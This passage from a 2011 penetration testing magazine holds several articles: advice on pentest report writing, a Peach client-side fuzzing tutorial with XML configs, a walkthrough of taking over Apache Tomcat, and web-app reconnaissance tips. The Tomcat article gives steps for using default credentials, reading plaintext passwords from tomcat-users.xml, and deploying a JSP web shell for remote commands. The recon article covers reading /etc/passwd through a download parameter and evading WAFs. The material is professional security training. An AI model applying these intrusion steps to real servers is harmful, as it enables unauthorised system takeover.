exposure to other networks or apps or dont have
a lot of experience then do some research about
the vulnerability. Heres how XYZ fixed it according
to Google. Okay maybe its not THAT simple but a
little research and effort can go a really long way to
building an effective report.
01/2011 (1) May

This applies to everyone. Once you have tested and


manually verified the vulnerabilities then do some
research on the issues. Did a major breach occur
somewhere else because of this vulnerability?
Thats something you should be reporting. XYZ
leaked 10,000 credit card numbers due to a SQL
Injection closely related to vulnerability XXX. Thats
quite a bit more powerful than You have some
SQL Injection and I can insert my name in your
database. The more convincing you make your
argument the less likely a client or other department
is to counter with the old well its not that big a deal,
well fix it later. Sadly that is a prevailing attitude and
can be correct with this approach.

Remediation

I have noticed both from the reports Ive reviewed and


just being in the industry for a while that a vast majority
of penetration testers shy away from even mentioning
remediation techniques.
This is a shame to me as I think testers can bring
a very unique perspective to the remediation process.
Im not completely sure on the reasoning behind the
shyness but I can guess.
At any rate I think offering some remediation advice
in reports is invaluable when looking at these things
from an operations perspective. A question I get quite a
bit from my customers is okay Ive got this report from
vendor X, how do I fix this stuff? No one is an expert in
everything so while you can provide some advice be
honest about where your expertise lay.
Go gather some external resources to help you out
where your skills might be weak, this helps build the
experience I discussed earlier. On with the list.

Page 15

Each vulnerability should have a remediation


section. It should explain some possible fixes to
the issues along with well known industry best
practices for fixing the issue.
Stop it with simply listing links to remediation
resource. While I think a resource and reference
section is useful and valuable it cannot b the only
remediation advice you supply. You are being paid
for your advice, dont chicken out.
If you have previous experience with a particular
issue the note that in your report. Offer some sort
of special assistance with that issue, dont just be a
paper generator.
Some would argue that offering remediation advice
limits your objectivity. I would argue it helps you
know your client better, builds your testing skills and
keeps your other skills sharp. Its really a win all the
way around.
http://pentestmag.com

STANDARDS

I touched on this one before but it is worth


repeating I think. Learn to speak the language of
your audience. It is worth the time investment to
communicate to your end audience in a way theyre
accustomed to. Dont make them learn a new
language to read your report. That approach leads
to reports sitting on a shelf with no action taken.

Re-test

Once vulnerabilities are fixed, they should be re-tested


to be sure the fixes work. We typically include it as
part of an up-front engagement but however you do
it make sure it gets done. This does a lot of things to
reinforce your initial testing but primarily it provides a
metric to show how serious a company or department
is to fixing vulnerabilities. It can even be used to show
how a company or department measures up to another
organization or department as it relates to remediation.
Not to say that people respond to competition but
people respond to competition. It is just human nature.

Simply running through your evidence sections in


the initial vulnerability might suffice for a re-test.
However, I recommend a more thorough re-testing,
as an applied patch or a fix in one script might have
introduced some new exploitable hole. You will
want to try to find those on a good re-test.
Once you have completed the re-test then you
should update your report with the results of that
testing. I like the change log format that shows
when something was discovered and when
something was resolved. If a given issue was not
resolved then you can note that in the same format.
Dont be afraid to update your remediation advice
on a re-test. No one is perfect, its okay. If you
find that a particular technique doesnt work for
resolving an issue, note that and find a technique
that does. This can be included in the trust factor
mentioned above allowing you to scale your
confidence in a given fix more easily.
What if you a find a new issue during the retest? Then you are doing your job. Make a new
vulnerability report and let your client know, then
begin the same process all over again. This just
makes you a better tester as you will learn to be
more and more thorough as you go on.

Report Tips

Before I wrap up I wanted to just review some general


reporting tips.

Provide a cheat sheet so that your end audience


can quickly see a general summary of what is in
01/2011 (1) May

the report. I am a huge fanboy of cheat sheets, Im


fairly convinced that if properly used they can do
anything.
Remember that these reports will probably be
very chunked up when delivered to the various
remediation teams. Provide the report in a format
that is easy to break apart and can stand on its
own.
Provide a guide to using your report. Help files
are wonderful, a tutorial on how to read the report
would be great. This helps end audiences know
where theyre supposed to look for things, etc. Now
needing this violates the keep it simple principle
but it removes any confusion. Remember what is
simple to you might not be to someone else.
Make sure you provide a method for your end
audience to comment on your report or ask
questions. A wrap up meeting or conference call is
always the best way to accomplish this. You should
always be able to defend and explain your work.
Do not just leave a stack of paper on your
customers desk. Be available to help, explain,
defend, etc. You should not be a hit and run
penetration tester.

As I re-read this article I realize its probably very


condescending sounding to experienced testers. If
that is the case, then this article is not for you. Based
on this review of some big name firms testing reports
though, a lot of folks need a refresher course in report
writing. These tips would apply to whatever sort of
testing you are doing. From physical penetration to
social engineering to remotely exploiting a server, all of
these things require proper and useful reporting. Your
hard work and your end customers deserve nothing
less.

BILL MATHEWS
Bill Mathews is co-founder and
lead geek of Hurricane Labs,
an information security firm
founded in 2004. Bill wrote
this article while recovering
from
pneumonia
so
any
errors are purely the result of
medication. :-) You can reach
Bill @billford on Twitter and be
read other musings on http://
blog.hurricanelabs.com

Page 16

http://pentestmag.com

Page 17

BLACK BOX

How Fuzzy Are You


Today?
A Guide to Client-Side Fuzzing Using Peach
What do you do if your targets are fully patched and you do not
find any configuration issues during a penetration test? Do you
take the blue pill and tell the client hes safe (and everybodys
happy) or do you take the red pill and go deep into the rabbit hole
to find those hidden bugs? Lets take the red pill and see what
happens

his article does not disclose any vulnerabilities; it


presents a generic way of finding vulnerabilities
by doing client-side fuzzing, using the Peach
fuzzing framework. You will also find an example of how
to fuzz a HTTP client by feeding it with malformed HTTP
response headers.

your chances are lowered by the fact that decent


software vendors may have a well-defined quality
assurance program. This program may not be limited
to functionality testing only, but it may also include
security testing using some of the methods described
below.

Bug hunting today

Nowadays, it is not easy finding vulnerabilities in


decent software. Besides the high amount of time and
resources you must spend in finding vulnerabilities,

Figure 1. Gaining access by attacking the client

01/2011 (1) May

Figure 2. Sequence of events for client-side fuzzing

Page 18

http://pentestmag.com

Nevertheless, finding exploitable vulnerabilities is


a rewarding activity. Some of the best vulnerability
researchers may win substantial prizes at hacking
competitions such as Pwn2Own or they could make
money on their findings by selling their code on the
legitimate/illegitimate exploit markets.

How do we find those bugs?

There are a few approaches that can be used for


finding security vulnerabilities. Each has its pros
and cons and should be chosen according to your
situation (software vendor, penetration tester, bug
hunter, etc). If you have the source code of the target
application, you can do a source code review and
try to identify exploitable weaknesses. Without the
source code, reverse code engineering might be a
choice, but its a painful activity for medium and large
applications.
A common approach for vulnerability discovery is
black-box testing. Fuzzing is a method of doing blackbox testing by analyzing the application according to its
inputs and outputs, having little knowledge of whats
inside.
What do you think will happen if the following C
function is called with an argument passed directly from
user input?

void function(char* user_input) {


char local_buf[500];

sprintf(local_buf, Received from user: %s, user_input);

Depending on the input data, it can behave normally


or it can crash (Access violation when writing location
/ SIGSEGV). Of course, this is a piece of unmanaged
code written in C, which does not benefit the security
mechanisms offered by a runtime environment, like
C#, VB or Java code does.
Hence, there are some classes of bugs (buffer
overflows, integer overflows, format string issues) which
are prone to be found in unmanaged code (C/C++).
This type of bugs will be the target of our discussion for
this article.

Attack the server or the client?

The number of server applications is considerably smaller


than the number of client applications. Furthermore,
servers are more often updated and patched while client
applications are often neglected (each user can have a
different version of the client application).
Listing 1. Param element
<Peach>

<Include ns="default" src="file:defaults.xml" />

<Run name="DefaultRun">
<Test ref="test1"/>

<Logger class="logger.Filesystem">

<Param name="path" value="c:\tools\fuzzers\

</Logger>

peach2.3.8\peach\logs" />

</Run>

<!-- other elements described below -->

</Peach>

Listing 2. Launching the target application under a debugger

<Test name="test1">

<StateModel ref="sm"/>

<Agent ref="windbg"/>

<Publisher name="socket"

class="tcp.TcpListener">

<Param name="host" value="127.0.0.1"/>


<Param name="port" value="80"/>

</Publisher>

<Publisher name="launch" class="process.Debugger

</Test>

Launcher"/>

Figure 3. Peach XML elements hierarchy

01/2011 (1) May

Page 19

http://pentestmag.com

BLACK BOX
In the vulnerability research area, there has been
a considerably greater effort in fuzzing servers than
fuzzing clients. The reason for this is that clients
Listing 3. Actions within a State
<Agent name="windbg">

<Monitor class="debugger.WindowsDebugEngine">
<Param name="CommandLine" value="c:\

are considered less important than servers; this is a


seriously wrong assumption. Since a server trusts a
client, the client becomes an extension of the servers
domain of trust (see Figure 1).
So lets attack a client. We will show how the Peach
fuzzing framework can be used to act as a server and
send malformed input to clients.

Building a client-side fuzzer

publisher="socket"/>

If you want to fuzz, you need a fuzzer. You can write it


yourself or you can use one of the many existing fuzzers
on the net. Using one of these pre-existing fuzzers may
or may not fully meet your expectations or needs.
If you still do not want to write your own fuzzer, you
can use a fuzzing framework to build a custom fuzzer
to fulfill your needs. Well known fuzzing frameworks
include Spike, GPF, Sulley, Autodafe and Peach (which
well discuss in this article).
Regardless of the network protocol, we want our
fuzzing setup to follow the steps described in Figure 2.
Lets see how we can implement this diagram in
Peach.

method="dostart"

About Peach

Program Files\Mozilla Firefox\


Firefox.exe http://127.0.0.1/"
/>

<Param name="StartOnCall" value="dostart" />

</Monitor>

</Agent>

Listing 4. StateModel
<StateModel name="sm" initialState="initial">
<State name="initial">

<Action name="start_listen" type="start"


<Action name="start_target" type="call"
publisher="launch"/>

<Action name="accept" type="accept"

publisher="socket"/>

<Action name="recv" type="input"

publisher="socket">

<DataModel ref="Request_Model"/>

</Action>

Peach is a fuzzing framework, written by Michael


Eddington, which is capable of performing both
generation and mutation based fuzzing.
The terms generation fuzzing and mutation fuzzing
refer to the way the fuzzer creates output data.

<Action name="send" type="output"


publisher="socket">

<DataModel ref="Response_Model"/>

</Action>

<Action name="stop_target" type="stop"


publisher="launch"/>

<Action name="stop_listen" type="stop"


</State>

publisher="socket"/>

</StateModel>

Listing 5. Hello from server


<DataModel name="Request_Model">

<String name="client_request"/>

</DataModel>

<DataModel name="Response_Model">

<String value="hello from server"/>

</DataModel>

01/2011 (1) May

Generation based fuzzing uses a specification


(e.g. RFC) of the fuzzed protocol or file format to
generate output data which is close to the format
accepted by the application.
Mutation based fuzzing takes another approach
for data generation. It starts from valid data (i.e. a
valid file, network packet, etc) and performs various
modifications (i.e. mutations) in order to trigger
vulnerabilities in the target application.

Our custom fuzzer must be described in a Peach


Pit file, which is actually an XML file that defines the
structure, type information, and relationships in the
data to be fuzzed. The hierarchy of these elements is
shown in Figure 3.
The top element is Peach which is just a container for
the other elements. When we start Peach, we actually
tell the fuzzing framework to use one Run element
from the XML file. One Run must contain at least one
Test and an optional Logger. The Test contains a State
Model (which is a series of States), an optional Agent
(for instrumenting the target application) and one or
more Publishers (used for transmitting data).
Page 20

http://pentestmag.com

Inside a certain State, the fuzzer can perform various


Actions (e.g. send data, receive data, open/close files,
etc). Actions are performed using data described by
a Data Model. In order to specify certain values to be
used in the Data Model, we can use a Data element
with necessary Fields.
Peach XML elements can be referenced inside other
elements using the ref attribute and specifying the
name of the referenced element (which can be defined
elsewhere).
Each element can have a certain class attribute. The
best reference for Peach element classes is the source
code (Python) which can be downloaded freely from
www.peachfuzzer.com.
Lets see how we can model the client-side fuzzer in
a Peach PIT file.

Creating a custom fuzzer with Peach

In the main Peach element (Listing 1) we must include


the file defaults.xml which is the configuration file for
this Peach instance. This file should setup the proper
paths to indicate were Peach is located and also import
the standard modules.
The Run element defines the starting point of the
fuzzer and contains a reference to a Test element and
a Logger. The Logger specifies where log messages
should be written. As you can see, some elements
require parameters specified by Param element.
We go on detailing the referenced Test element.
As you can see in Listing 2, inside a Test we specify
a reference to a StateModel, a reference to an Agent
element and two publishers. We differentiate Publishers

by their name. The publisher named socket tells Peach


to start a TCP listener on localhost, port 80, in order
to behave as a server. The other publisher launch
will be used to launch the target application under a
debugger.
The Agent that we configured (Listing 3) is a local
process which activates a Monitor component which
in fact is Windows Debugger that starts the target
application. One important aspect is the parameter
called StartOnCall which tells the agent to start the
Monitor only when an Action of type call will happen
with the value/method dostart. In this way, we can
control the behavior of the target application from the
Actions within a State.
The XML element that will model the states and
transitions that our fuzzer will follow is called StateModel
(Listing 4). In our case, it contains a single State called
initial. Inside this state, we command Peach to perform
the following Actions on specific Publishers (according
to Figure 2):

Publisher socket open socket and start listening


Publisher launch start target under debugger
Listing 6. Launcher.html
<html>
<body>

Let's eat some malformed HTTP responses <br>


<script type="text/javascript">
var timeout = 500;

var id = "myiframeid";
function setIframe() {

var iframe = document.getElementById(id);


if(iframe) {

document.body.removeChild(iframe);

iframe = document.createElement("iframe");
iframe.setAttribute("src", "http://
127.0.0.1");

iframe.setAttribute("id", id);

document.body.appendChild(iframe);
}

Figure 4. Running our fuzzer in debug mode (Part 1)

setTimeout("setIframe();", timeout);

setTimeout("setIframe();", timeout);

</script>

</body>
</html>

Figure 5. Running our fuzzer in debug mode (Part 2)

01/2011 (1) May

Page 21

http://pentestmag.com

BLACK BOX

Publisher socket accept for incoming connection


(blocking operation)
Publisher socket read input from client into
DataModel Request_Model
Publisher socket send output to client from
DataModel Response_Model
Publisher launch stop target
Publisher socket close socket
Listing 7. Response_Model
<DataModel name="Response_Model">

<String value="HTTP/1.1 204 No Content\r\n"


isStatic="true"/>

<String value="Set-Cookie: " isStatic="true"/>


<String value="cookie_name"/>

<String value="=" isStatic="true"/>


<String value="cookie_value"/>

<String value="; " isStatic="true"/>

<String value="path=" isStatic="true"/>


<String value="/"/>

<String value="; " isStatic="true"/>

<String value="expires=" isStatic="true"/>


<Block name="date">

<String value="Thu"/>

<String value=", " isStatic="true"/>


<String value="01">

<Hint name="NumericalString" value="true"/>

</String>

For this skeleton fuzzer, we do not specify any fancy


data model, just an input string and an output string.
We expect the client to send a request (that will be
stored in a DataModel) and the fuzzer will respond with
the (fuzzed) message: hello from server. See Listing 5.
Before running the fuzzer, it is a good idea to test
our Pit file (using t switch). If there are no parsing
errors, we can start the fuzzer in debug mode to see
what exactly is happening. We can see in Figure 4
and Figure 5 how the framework runs all the actions
that weve configured, the request message and the
response message.
Even though this mechanism is generic for client
side fuzzing (you can fuzz any client application), it is
rather slow because the fuzzer opens and closes the
target application for each response generated (For
example, Firefox takes about 2-3 seconds to start and
make the HTTP request on my machine). Depending
on the target application, we can optimize the fuzzing
mechanism to be faster.
In case of a web browser, we can start it just once
and load the html file from Listing 6. It will automatically
reload at 0.5 seconds and make a new HTTP request
to our fuzzer at http://127.0.0.1. The Monitor element
from Listing 4 must be modified as below (no need for
StartOnCall parameter):
<Monitor class=debugger.WindowsDebugEngine>

<Param name=CommandLine value=c:\Program Files\

<String value="-" isStatic="true"/>

Mozilla Firefox\Firefox.exe C:\tools\fuzzers\peach\

<String value="-" isStatic="true"/>

</Monitor>

<String value="Jan"/>

<String value="2020">

<Hint name="NumericalString" value="true"/>

</String>

<String value=" " isStatic="true"/>


<String value="00">

<Hint name="NumericalString" value="true"/>

Peach2.3.8\mytest\launcher.html />

Now that we have the fuzzing mechanism working


more efficiently, lets focus more on the output data.
Lets suppose we want to fuzz the web browsers
capacity of handling HTTP Set-Cookie header. We
want to send to the browser HTTP responses like:

</String>

<String value=":" isStatic="true"/>


<String value="01">

<Hint name="NumericalString" value="true"/>

</String>

<String value=":" isStatic="true"/>


<String value="03">

<Hint name="NumericalString" value="true"/>

</String>

<String value=" " isStatic="true"/>


<String value="GMT"/>

</Block>

<String value="\r\n\r\n" isStatic="true"/>

</DataModel>

01/2011 (1) May

Figure 6. HTTP requests and fuzzed HTTP responses

Page 22

http://pentestmag.com

HTTP/1.1 204 No Content

Set-Cookie: cookie_name=cookie_value; path=/; expires


=Thu, 01-Jan-2020 00:00:01 GMT

For this, we need to modify our data model named


Response_Model as shown in Listing 7. The elements
that we do not want to be fuzzed will be marked as
isStatic=true. We organized the date into a Block
element so it can be referenced later in the Data
Model, if necessary. Please observe the Hint added
to the String element which tells the fuzzer to produce
numbers as strings, not as integers.
Using the Add-on Live HTTP Header, we can see
the headers exchanged between the target application
(Mozilla Firefox) and our fuzzer.
Any crashes or abnormal events will be reported
in the log file that weve configured; however, crash
analysis is another aspect of fuzzing, but it is beyond
the scope of this article.

Conclusion

Penetration testing is not limited by the power of


vulnerability scanners or common manual checks. We
know that there is no application that is 100% secure so
its just a matter of time and work before those hidden
vulnerabilities come out to light.
Fuzzing is a way of finding those vulnerabilities.
Although it doesnt offer any guarantees for success,

it might work when everything else fails. Depending on


the timeframe of the pentest engagements, digging for
zero days can provide interesting results.
Creating a custom fuzzer using a fuzzing framework
is faster than writing a dedicated one, but customizing
the fuzzing framework can be time consuming at the
beginning (until you obtain the desired behavior). In case
of Peach, the learning curve is pretty high; however,
Peach is a very powerful and complex fuzzer that has
the potential of finding deeply hidden vulnerabilities.

ADRIAN FURTUNA
Adrian Furtuna works as
a Senior Advisor at KPMG
Romania where he is involved
in
penetration
testing,
vulnerability assessment and
security audit projects. Adrian
has a particular interest in
offensive security techniques
which he studies as part of
his PhD program at Military Technical Academy of Bucharest.
He has also published a number of scientific articles at various
conferences discussing Red Teaming activities, cyber defense
exercises and denial of service attacks. Adrian can be contacted
by email at adif2k8@gmail.com.

Comment
Clients Less Important Than Servers

I believe that Furtuna is exactly right about clients


being less important than servers. Through my years
as a penetration tester, I have seen my clients spend
a lot of time and resources to lock down their servers.
Overall, they do a pretty good job at this; however,
client systems are treated like the red-headed step
children. They are seldom managed in the same
ways as the critical servers. As Furtuna points out,
clients become an extension of the servers domain
of trust and should be taken into consideration in the
organizations entire security posture. I cant tell you
how many times I have personally gained root access
to an entire domain through the lack of controls over
a client device. And of course, finding a vulnerable
client-side application through the fuzzing example
explained in this article is just one of the many ways
that root access can be obtained.

01/2011 (1) May

JOHN J TRINCKES, JR.,


John J Trinckes, Jr., CISSP, CISM, CRISC, CTGA, C-EH, NSAIAM/IEM, MCSE-NT, A+, author of The Executive MBA in
Information Security published by CRC Press and co-founder
of KeeDragon.com.

Page 23

http://pentestmag.com

NETWORK SECURITY

Dueling Apache
Tomcat
Setting up a JSP-enabled web server is cumbersome and complex.
Apache Tomcat aims to solve this dilemma by providing a quick,
easy, and cost-effective solution for developers to deploy their
applications and services. While this is great for functionality,
its default configuration can greatly decrease the security of a
network.

n this article, we will explore these vulnerabilities


and how penetration testers can use them to
their advantage. During many penetration-testing
engagements, we have found installations of Apache
Tomcat that have been left with the default configuration
settings in place. In fact while the installation process
is quick and easy, it does not lead the administrator
through important settings and forces a post-installation
review that sometimes is easily forgotten. After reading
this article, remote command execution could be
something really simple like: Figure 1.

Step One: Identification

Figure 1. Remote Command Execution through a Web browser

Figure 2. Default page for Apache Tomcat

01/2011 (1) May

The first step is to identify which systems have Tomcat


installed; common used TCP ports are 80 or 8080. A
quick port scan will do the trick or you can manually
connect to these ports with your browser and find a web
page similar to the one depicted Figure 2.

Step Two: Authentication

The second step is to authenticate to the Tomcat


web-based administration tools, Tomcat Manager or
Tomcat Administration. As of Tomcat v5.5, the Tomcat
Administration web console is no longer installed by
default. If you are able to find this installed on the
server; you are in luck. The default username for
Tomcat Administration is admin and the password
is admin or blank. Once you click on Tomcat
Administration, you should see a page similar to the
one depicted Figure 3.

Page 24

http://pentestmag.com

Figure 6. Tomcat Web Application Manager

Figure 3. Tomcat Administration login page

If you are able to login you will be able to view server


settings and manage users. You can also grab the
passwords for the other default users such as tomcat
or role1 by looking to the html code of the page Users
within the section User Definition.
Quick Tip
You can use Metasploit to scan the network for Apache
Tomcat installations in order to identify the administration
console. You can also perform a password dictionary
attack to guess the correct username and password.
The auxiliary module to accomplish this is named:
Tomcat Administration Tool Default Access.
Whether the administration console is installed or not,
we can move on to our next target which is the Tomcat
Web Application Manager. We can use the same admin
password that was discovered earlier to login. The
Tomcat Web Application Manager looks like: Figure 6.

The web console permits users to completely control


applications, i.e uploading, deleting and modifying, but
for the sake of our discussion lets focus on uploading.
Tomcat, being a JSP-enabled webserver; accepts
applications that are packaged as Java Web Application
Archive files or simply WAR. In order to utilize this, we
must include a JSP web shell in our WAR file.
Quick Tip
You might not be able to successfully guess the login
credentials for web tool management. There still is a
way to authenticate to the server. If you have regularuser or read access to the system, review the tomcatusers.xml file located in the following path: C:\Program
Files\Apache Software Foundation\Tomcat 5.0\conf.
Just replace with the servers path to Tomcat. The
usernames and passwords for Tomcat are configured
in plain text within this file as shown in the following
Figure 7.

Figure 4. Tomcat web administration of users

Figure 5. User passwords in the html source code

01/2011 (1) May

Figure 7. Tomcat configuration files store passwords in plain-text

Page 25

http://pentestmag.com

NETWORK SECURITY

Figure 11. Creation of a new Context

Figure 8. Example of WAR content

Figure 12. Web Shell

Figure 9. Adding the web shell to the WAR package

Step Three: Control

During this step, we are going to modify a WAR file


to include a web shell to execute operating system
commands via our browser. Lets start downloading
a sample WAR file such as: http://tomcat.apache.org/
tomcat-5.5-doc/appdev/sample/sample.war.
The content of the WAR file can be shown by an
archive tool like 7-zip as in the following Figure 8. The
next step is to add a JSP web shell like for example: http:
//net-square.com/papers/one_way/one_way.html#4.0.4.
Copy the source code in a text editor like Notepad
and save it with the filename cmdexec.jsp. Drag this file
to the contents of the WAR file and we got a cooked
archive like: Figure 9.
The last step is to upload the cooked WAR package
through the Tomcat Manager: in the Deploy section
select the WAR file to deploy using the Browse button
and then the Deploy button does the magic. When the
upload is finished, the Tomcat Manager shows an OK

Figure 10. Deploying the cooked WAR package

01/2011 (1) May

message and a new web application appears as in the


following Figure 11.
The cmdexec.jsp web shell from our new application
is now ready to be used as we can test in a local
installation of Tomcat: see Figure 12.
Remember the first figure of this article? Simply the
shell command whoami was filled in a form like the one
above. Our pentesting is over: we have demonstrated
the complete control of the system because any
command can be now remotely executed.
Quick Tip
By default, the Tomcat service is installed under the
SYSTEM account in Microsoft Windows. This account
has more rights that even the local Administrator
account.
Quick Tip
The testing we have seen can be automated by using
Metasploit with the exploit named: Apache Tomcat
Manager Application Deployer Authenticated Code
Execution but consider that sometimes it doesnt
provide reliable results and the manual approach
should be chosen.

JOVON ITWARU
Jovon Itwaru is lead security analyst at Core Defend
Technologies. He provides a holistic approach to security
that allows clients to better under security and the role they
must take in proactively defending their network. He can be
reached at jovon@coredefend.com. More information about
the company can be found at http://www.coredefend.com

Page 26

http://pentestmag.com

Page

WEB APPLICATION SECURITY

Heuristic Methods vs.


Automated Scanners
Which is the most efficient? Humans? Machines? Or the
two in tandem?
As most penetration testers know, a manual check of a Web
Application can be much more thorough than a completely
automated one. By combining a few assistant tools for example,
an intercepting proxy (see Figure 1) and perhaps a vulnerability
scanner that may find overlooked parts one can improve his or
her assessment of actual vulnerabilities.

he manual methodology, however differs


appreciably from one ethical hacker to another,
and in many cases only very basic (common)
ways of approach are used.
By using a heuristic method manually, the efficiency of
finding a vulnerability within the target web application can
increase drastically. So what exactly is this methodology to
which Im referring? It may seem quite common to some
individuals even though it hasnt been publicly sharedyet
(except, of course, in this magazine). Creating a fuzz-word
(also known as a XSS-locator string) is the first step, as
this can break almost any non-sanitized function relying

on proper syntax, Cross-Site Scripting (XSS) issues, and


almost any other input validation vulnerability.
This is only the first step; the second step or goal is
to know how WordPress, vBulletin, Joomla, etc. looks
not only in HTML source code but also by design. The
colours and various other elements may have been
changed, but generally the blocks where information is
displayed are usually at the same location on every site.
This makes it easy to see if the site runs a custom-made
or a well-known CMS.
For example, vBulletin 4 almost always has the
login field in the top right, and within the source code
in the header fields, theres usually a line of included
JavaScript code (see Figure 2) which reveals the
overall version (rarely patch level).
This would indicate that the target is running vBulletin
4.1.2, and by looking in the JavaScript file the patch level
may be revealed, depending on how the administrator
updated the forums the last time he or she did so. With
Joomla its common to see com_xxx in the source, and
with WordPress a common item within the source would
be wp-content.

Figure 1. Burp Suite Free: Spidering a website

Figure 2. Firebug: Viewing a JavaScript file

01/2011 (1) May

Page 28

http://pentestmag.com

Figure 4. Exploit-DB: Searching for vBulletin Exploits


Figure 3. FireFox: Viewing the HTML source of a website

Those are just examples, but more important is to


know how a default installation looks like as compared
to one with add-ons. Some add-ons are hard to spot,
almost transparent while some leave comments within
the source like <-- Super Insecure Addon 1.2.3 --> (see
Figure 3) which gives the advanced penetration tester
an advantage, since he can then just download the addon and look for vulnerabilities within this him- or herself
and perhaps find a 0day exploit!
But why find an unknown vulnerability within the
target web application? Maybe its fully up to date and
patched, so there are no other ways of entry after a very
thorough and automated scan has been done. In these
cases a penetration tester could, if time allows it, look
for these so-called 0days.

The Difference in Development Life Cycles

So far, many automated scanners would have found


nothing or almost nothing, because theyre not designed

to find all kinds of 0days, but hopefully most penetration


testers are. One should understand, however, that it
may be extremely time-consuming to do find some
of these exploits by hand. Some of these unknown
vulnerabilities are often found by accident, if the target
web application is a well-known one or has at least had
a good Secure Development Life Cycle (SDLC).
If the target web application didnt have any security
applied at the development phase, an automated
scanner would probably pick up vulnerabilities in a matter
of seconds, and if the web application did have security
somewhat applied, an automated scanner might not find
any of the vulnerabilities, but a penetration tester with the
right knowledge, not wanting to look through hundreds
or thousands lines of code, would probably find one or
several vulnerabilities.
The biggest danger is that the developer decides that
the scanner he has chosen is the best and the only right
tool to use, and if that returns no vulnerabilities (false
negatives), then there arent any. Therefore, if a human
penetration tester and not just an automated scanner

Contribute
Penetration Testing Magazine is a community-oriented
magazine. We want IT security specialists and enthusiasts
to work together and create a magazine of the best quality,
attractive to every individual and enterprise interested in the
penetration testing field.
If you are interested in being a part of our community
submit an article or bring up a subject you consider important
and up-to-date. Are there any trends on the market youd like
to take a closer look at? Are there any tools or solutions worth
reviewing or presenting to the community? Are there any
touchy and controversial issues you feel have to be discussed
in public? Then share your opinions with us.
If you run an IT security company, your contribution is the
most welcome. Tell us about your solutions and advertise
in the magazine for free, or have a special issue devoted
exclusively to you. As long as you provide top-notch quality of
you writings, we are always ready to cooperate and help your
company develop with us.
Are you a student? Were looking forward to you articles!
Fresh attitude, opinions and beliefs of the young and budding
IT security gurus are invaluable for us. You will give your career
a great start when you write to a respectable IT magazine.

Showing an issue with your name among the names of other


authors and often famous ones will be your great asset
during a job interview.
If you think you dont have enough time to create an article
from scratch, but feel interested in the magazine become
one of our beta testers. This way you will get the opportunity
to look at a new issues contents before its even published,
and your name, too, will appear in the magazine. If you feel
the need to contribute and share you knowledge, but dont
have enough spare time for creative writing beta testing is
just for you.

Sections:
White Box
Black Box
Web Security
Network Security
Wireless Security

Application Security
Standards and Methodologies
How To
Open Source Intelligence
Vulnerabilities

WEB APPLICATION SECURITY


had tested the application, it wouldve been more
secure and not contained several security issues.

The Backend + (Fingerprinting &


Subdomains)

Another important factor is the backend: the webserver


is a major part of this, but so also is the coding language
used, both of which may give the penetration tester
an idea of which vulnerabilities to expect. A common
vulnerability for too many ASP(x) powered sites, would
be the infamous search.asp?q=XSS vulnerability, which is
often non-persistent (reflected) yet still a vulnerability.
Imagine a website running vBulletin, which is a forum
web application. The footer containing the version
information is removed, and the generator meta header is
also removed. The general design is heavily altered, but
it still looks somewhat like vBulletin. So the penetration
tester assumes he or she can use the Version Disclosure
trick shared earlier in this article, to find out which version
is installed. If a vulnerable version is found and theres
a public Proof of Concept available (see Figure 4), then
the penetration tester has already made one foothold,
depending on the type of vulnerability.
Now imagine another website, perhaps a custom-built
one where an automated scanner returns no results. Still,
almost all web applications or custom websites contain at
least one vulnerability, because sometimes the vulnerable
applications are located on outdated subdomains.
In order to find these subdomains, which are often on
the same server, the penetration tester can use (e.g.)
Google if the targets nameserver does not allow AXFR
requests which potentially could return a zone-transfer.
(see Figure 5.)
In this case all the subdomains points to the same IPaddress, which the penetration tester is allowed to test,
including all vhosts (Virtual Hosts) on the webserver.
Each virtual host can have its own physical directories
separate from the others, and these can even contain
vulnerable code as well! Therefore it is logical to test
these if they are within reach of the penetration.
The query that most automated scanners would most
likely not even try could look like the one in Figure 6.
Assume the target runs PHP, which Apache usually

Figure 5. dig: Requesting a DNS Zone-Transfer

01/2011 (1) May

does. In case of ASP, its most likely powered by an IIS


webserver. The above query returns the main domain
and subdomains (excluding the forum), where the fileextension is .php. It can also be modified to exclude
directories and several other subdomains, so instead of
excluding the forum, www is often used in my queries,
which filters most of the main website away, making it
easier to find potential subdomains with dynamic PHP
scripts, for example.
Usually it is possible to just look at error pages (e.g.,
404) served by the webserver, or HTTP headers for that
sake, in order to determine the scripting language and
webserver. The problem is that some administrators
change these headers and error pages, but rarely the
file extension, except in SEO cases where .php might
be .html instead, but on the backend its still PHP files
used to serve the website.
The reason why this query is used is because many
websites use rewrite-rules (e.g., mod_rewrite) these
days, so its sometimes hard to guess whats powering
the target website. Especially when theres no default
index file such as index.php. So by finding just one
dynamic file with the .php extension, its easier not only
to assume which vulnerabilities to look for, but also to
test this mentioned file or perhaps several returned files
from the search query.
Most PHP files without any visible GET or POST
requests visible are not much help, and some do not
show even if these files are accessed directly; however,
if theres a link to one of these, then Google will most
likely know some or all of the requests that may contain
a vulnerability due to non-sanitized input.

Heuristically Approaching & Avoiding WAFs

Imagine you see that the file accepts 2 GETrequests, the first one is loggedin=1 and the second is
downfile=info.pdf. Obviously if the pseudo-file info.pdf
can be downloaded with this call, the penetration
tester should try to download other files, perhaps the
well-known /etc/passwd. An automated scanner will try

Figure 6. Google: Using Operators for Recon and Enumeration

Page 30

http://pentestmag.com

predefined strings until it finds something useful, while


a manual and heuristic method would probably be much
more fruitful. (see Figure 7)
Using a program to find these possible vulnerable
files is a good idea, but testing them manually may
return more interesting results, such as shown below.
In this case, a locator-string like pentest01/\>< could
be used. It doesnt look like much, but if all characters
are returned without being sanitized, then its possible
to perform XSS. If a SQL-error is returned, perhaps
invalid syntax then or broke the SQL-query, which
thereby allows a possible SQL-injection. If a file-error
is returned, then LFI or RFI may be possible. In case
of no such command, perhaps RCE (Remote Code
Execution) could be attempted.
This way of finding vulnerabilities only applies to
input validation vulnerabilities, which are often the most
dangerous vulnerabilities. Because the penetration
testers goal is to gain access to the server backend,
its logical to assume that high-risk vulnerabilities
are the most valuable. Its true that XSS can lead to
Remote Code Execution as well (see Figure 8), but this
approach requires user interaction.
Our locator-string (a.k.a. fuzz-word) required 1 query
(see Figure 9) while the automated scanner created
most likely a massive overhead by sending perhaps 10
different strings to determine if there was a vulnerability
and what it might have been. Most Intrusion Detection
Systems (IDS) wouldve picked up on this amount of
attempts and traffic, while the fuzz-word may not have
been detected at all. Most Web Application Firewalls
(WAF) would not get triggered by this fuzz-word either,
except that some including web applications may not
respond very well to the slash (/) due to mod_rewrite or >
and < since they are uncommon in most queries. Hence
the reason some WAFs are triggered by them.
Theres a reason why the locator-string is written
like >< in the end, and not <>. This is because most

Figure 7. 0day: Local File Disclosure

01/2011 (1) May

